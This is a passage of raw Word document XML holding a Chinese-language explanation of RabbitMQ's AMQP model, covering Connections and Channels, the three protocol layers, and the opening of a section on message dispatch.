          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>AMQP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>的命令。一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Connection</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>可以包含多个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Channel</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>。之所以需要</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Channel</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>，是因为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>连接的建立和释放都是十分昂贵的，如果一个客户端每一个线程都需要与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Broker</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>交互，如果每一个线程都建立一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>连接，暂且不考虑</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>连接是否浪费，就算操作系统也无法承受每秒建立如此多的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>连接。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>RabbitMQ</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>建议</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>客户端线程之间不要共用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Channel</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>，至少要保证共用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Channel</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>的线程发送消息必须是串行的，但是建议尽量共用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Connection</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE5624" w:rsidRPr="00F41A4C" w:rsidRDefault="00BE5624" w:rsidP="00BE5624">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在了解了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>AMQP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>模型以后，需要简单介绍一下</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>AMQP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的协议栈，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>AMQP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>协议本身包括三层：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE5624" w:rsidRPr="00F41A4C" w:rsidRDefault="00BE5624" w:rsidP="00BE5624">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="301" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5411470" cy="3200400"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="58" name="图片 3" descr="RabbitMQ 系列（一）AMQP协议 - 网易杭研后台技术中心 - 网易杭研后台技术中心的博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abbitMQ 系列（一）AMQP协议 - 网易杭研后台技术中心 - 网易杭研后台技术中心的博客"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId311" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5411470" cy="3200400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE5624" w:rsidRPr="00F41A4C" w:rsidRDefault="001E1CFF" w:rsidP="00BE5624">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="107" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:left="360" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>(1)</w:t>
      </w:r>
      <w:r w:rsidR="00BE5624" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidR="00BE5624" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00BE5624" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Modle Layer</w:t>
      </w:r>
      <w:r w:rsidR="00BE5624" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>，位于协议最高层，主要定义了一些供客户端调用的命令，客户端可以利用这些命令实现自己的业务逻辑，例如，客户端可以通过</w:t>
      </w:r>
      <w:r w:rsidR="00BE5624" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>queue.declare</w:t>
      </w:r>
      <w:r w:rsidR="00BE5624" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>声明一个队列，利用</w:t>
      </w:r>
      <w:r w:rsidR="00BE5624" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>consume</w:t>
      </w:r>
      <w:r w:rsidR="00BE5624" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>命令获取一个队列中的消息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE5624" w:rsidRPr="00F41A4C" w:rsidRDefault="001E1CFF" w:rsidP="00BE5624">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="107" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:left="360" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>(2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidR="00BE5624" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00BE5624" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Session Layer</w:t>
      </w:r>
      <w:r w:rsidR="00BE5624" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>，主要负责将客户端的命令发送给服务器，在将服务器端的应答返回给客户端，主要为客户端与服务器之间通信提</w:t>
      </w:r>
      <w:r w:rsidR="00BE5624" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>供可靠性、同步机制和错误处理</w:t>
      </w:r>
      <w:r w:rsidR="00BE5624" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE5624" w:rsidRPr="00F41A4C" w:rsidRDefault="001E1CFF" w:rsidP="00BE5624">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="107" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:left="360" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>(3)</w:t>
      </w:r>
      <w:r w:rsidR="00BE5624" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00BE5624" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Transport Layer</w:t>
      </w:r>
      <w:r w:rsidR="00BE5624" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>，主要传输二进制数据流，提供帧的处理、信道复用、错误检测和数据表示。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE5624" w:rsidRPr="00F41A4C" w:rsidRDefault="00BE5624" w:rsidP="00BE5624">
      <w:pPr>
        <w:ind w:firstLineChars="600" w:firstLine="1260"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0000774C" w:rsidRDefault="0000774C" w:rsidP="0000774C">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>消息分发机制</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B51E9" w:rsidRDefault="00EF015E" w:rsidP="00B339FD">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>RabbitMQ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>将第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>Message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>分发给第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
